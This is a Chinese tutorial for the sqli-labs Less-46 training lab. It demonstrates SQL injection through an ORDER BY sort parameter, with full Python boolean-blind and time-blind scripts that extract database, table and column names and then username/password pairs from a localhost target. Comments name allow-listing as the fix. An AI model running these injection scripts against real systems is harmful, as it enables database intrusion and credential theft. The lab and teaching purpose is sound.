背景：因为 order by、limit 无法使用预编译（参数绑定），所以有可能存在 SQL 注入漏洞
以靶场第46关为例子
用python布尔盲注
import requests
# Lab demonstration (sqli-labs Less-46): the `sort` query parameter is spliced
# into an ORDER BY clause. ORDER BY / LIMIT cannot be bound as prepared-statement
# parameters, so the server-side mitigation is to map the user-supplied value
# onto an allow-list of column names and never concatenate the raw string into SQL.
from lxml import html


def get_id_one(URL: str, paload: dict[str, str]) -> str:
    """Send one GET with `paload` as the query string and return the stripped text
    of the first cell of the first table row in the HTML response."""
    res = requests.get(url=URL,params=paload)
    tree = html.fromstring(res.content)
    # This single cell is the boolean oracle every probe below relies on.
    id_one = tree.xpath('//table//tr[1]/td[1]/text()')[0].strip()
    return id_one


def get_database(URL: str) -> None:
    """Recover the current database name one character at a time (boolean oracle)."""
    # get the database name
    s = ""
    for i in range(1,10):
        # binary search over the ASCII range [32, 128)
        low = 32
        hight = 128
        mid = (low+hight)//2
        while(hight > low):
            paload = {"sort": f"if((greatest(ascii(substr(database(),{i},1)),{mid})={mid}),id,username) -- "}
            # i.e. the condition "character at position i <= mid" is true
            id_one = get_id_one(URL,paload)
            if id_one=="1":
                # "1" in the first cell is read as the if() having selected `id`
                # (presumably the smallest id sorts first — not shown by this code)
                hight = mid
                mid = (low + hight) // 2
            else:
                low = mid +1
                mid = (low + hight) // 2
        s+=chr(mid)
    print("数据库名称:"+s)


def get_table(URL: str) -> None:
    """Recover the table names of schema `security` one character at a time."""
    # get the table names
    s = ""
    for i in range(1,32):
        low = 32
        hight = 128
        mid = (low+hight)//2
        while(hight > low):
            # here the probe is "character > mid", so the branches are the
            # mirror image of get_database()
            paload = {"sort": f"if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=\"security\"),{i},1))>{mid}),id,username) -- "}
            id_one = get_id_one(URL,paload)
            if id_one=="1":
                low = mid +1
                mid = (low + hight) // 2
            else:
                hight = mid
                mid = (low + hight) // 2
        s+=chr(mid)
    print("表的名称:"+s)


def get_column(URL: str) -> None:
    """Recover the column names of table `users` one character at a time."""
    # get the column names of the admin table
    s = ""
    for i in range(1,32):
        low = 32
        hight = 128
        mid = (low+hight)//2
        while(hight > low):
            paload = {"sort": f"if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=\"security\" and table_name=\"users\"),{i},1))>{mid}),id,username) -- "}
            id_one = get_id_one(URL,paload)
            if id_one=="1":
                low = mid +1
                mid = (low + hight) // 2
            else:
                hight = mid
                mid = (low + hight) // 2
        s+=chr(mid)
    print("列的名称:"+s)


def get_result(URl: str) -> None:
    """Recover the `username>password` pairs of table `users` one character at a time.

    NOTE(review): the parameter is spelled `URl` but the body references `URL`,
    so this function actually reads the module-level `URL` set under __main__.
    """
    # get the username and password information
    s = ""
    for i in range(1,32):
        low = 32
        hight = 128
        mid = (low+hight)//2
        while(hight > low):
            paload = {"sort": f"if((ascii(substr((select group_concat(username,0x3e,password) from users),{i},1))>{mid}),id,username) -- "}
            id_one = get_id_one(URL,paload)
            if id_one=="1":
                low = mid +1
                mid = (low + hight) // 2
            else:
                hight = mid
                mid = (low + hight) // 2
        s+=chr(mid)
    print("用户名及密码信息:"+s)


if __name__ == '__main__':
    # local lab instance only
    URL = "http://localhost/Less-46/"
    # get_database(URL)
    # get_table(URL)
    # get_column(URL)
    get_result(URL)
结果
用python时间盲注
import requests
# Time-based variant of the Less-46 demonstration: instead of reading the page,
# each probe makes the server sleep() on one branch of the if() and the client
# measures the response time. The same mitigation applies: allow-list the sort
# column on the server side rather than concatenating the `sort` value into SQL.
# Detection hint for defenders: a burst of requests whose latency clusters at a
# fixed multiple of a few hundred milliseconds is characteristic of this probing.
import datetime


def get_database(URL: str) -> None:
    """Recover the current database name one character at a time (timing oracle)."""
    # get the database name
    s = ""
    for i in range(1,10):
        # binary search over the ASCII range [32, 128)
        low = 32
        hight = 128
        mid = (low+hight)//2
        while(hight > low):
            paload = {"sort": f"if((greatest(ascii(substr(database(),{i},1)),{mid})={mid}),sleep(0.2),id) -- "}
            # i.e. the condition "character at position i <= mid" is true
            start = datetime.datetime.now()
            res = requests.get(url=URL, params=paload)
            end = datetime.datetime.now()
            # a response slower than 3 s is read as the sleep() branch having run
            # (.seconds is the whole-second part of the timedelta)
            if (end - start).seconds >=3:
                hight = mid
                mid = (low + hight) // 2
            else:
                low = mid +1
                mid = (low + hight) // 2
            print(chr(mid),mid)
        s+=chr(mid)
    print("数据库名称:"+s)


def get_table(URL: str) -> None:
    """Recover the table names of schema `security` one character at a time."""
    # get the table names
    s = ""
    for i in range(1,32):
        low = 32
        hight = 128
        mid = (low+hight)//2
        while(hight > low):
            # probe is "character > mid", so the branches mirror get_database()
            paload = {"sort": f"if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=\"security\"),{i},1))>{mid}),sleep(0.2),id) -- "}
            start = datetime.datetime.now()
            res = requests.get(url=URL, params=paload)
            end = datetime.datetime.now()
            if (end - start).seconds >=3:
                low = mid +1
                mid = (low + hight) // 2
            else:
                hight = mid
                mid = (low + hight) // 2
        s+=chr(mid)
    print("表的名称:"+s)


def get_column(URL: str) -> None:
    """Recover the column names of table `users` one character at a time."""
    # get the column names of the admin table
    s = ""
    for i in range(1,32):
        low = 32
        hight = 128
        mid = (low+hight)//2
        while(hight > low):
            paload = {"sort": f"if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=\"security\" and table_name=\"users\"),{i},1))>{mid}),sleep(0.2),id) -- "}
            start = datetime.datetime.now()
            res = requests.get(url=URL, params=paload)
            end = datetime.datetime.now()
            if (end - start).seconds >=3:
                low = mid +1
                mid = (low + hight) // 2
            else:
                hight = mid
                mid = (low + hight) // 2
        s+=chr(mid)
    print("列的名称:"+s)


def get_result(URl: str) -> None:
    """Recover the `username>password` pairs of table `users` one character at a time.

    NOTE(review): the parameter is spelled `URl` but the body references `URL`,
    so this function actually reads the module-level `URL` set under __main__.
    """
    # get the username and password information
    s = ""
    for i in range(1,32):
        low = 32
        hight = 128
        mid = (low+hight)//2
        while(hight > low):
            paload = {"sort": f"if((ascii(substr((select group_concat(username,0x3e,password) from users),{i},1))>{mid}),sleep(0.2),1) -- "}
            start = datetime.datetime.now()
            res = requests.get(url=URL, params=paload)
            end = datetime.datetime.now()
            if (end - start).seconds >=3:
                low = mid +1
                mid = (low + hight) // 2
            else:
                hight = mid
                mid = (low + hight) // 2
        s+=chr(mid)
    print("用户名及密码信息:"+s)


if __name__ == '__main__':
    # local lab instance only
    URL = "http://localhost/Less-46/"
    # get_database(URL)
    # get_table(URL)
    # get_column(URL)
    get_result(URL)
结果
注意：使用时间盲注时，因为 if 是在 order by 之后，而 order by 会遍历每一行，每一行都会执行一遍 sleep()；但是这里也不能用子查询，跟在 order by 之后无论 if 的条件判断正确与否，都会执行子查询里面的 sleep()。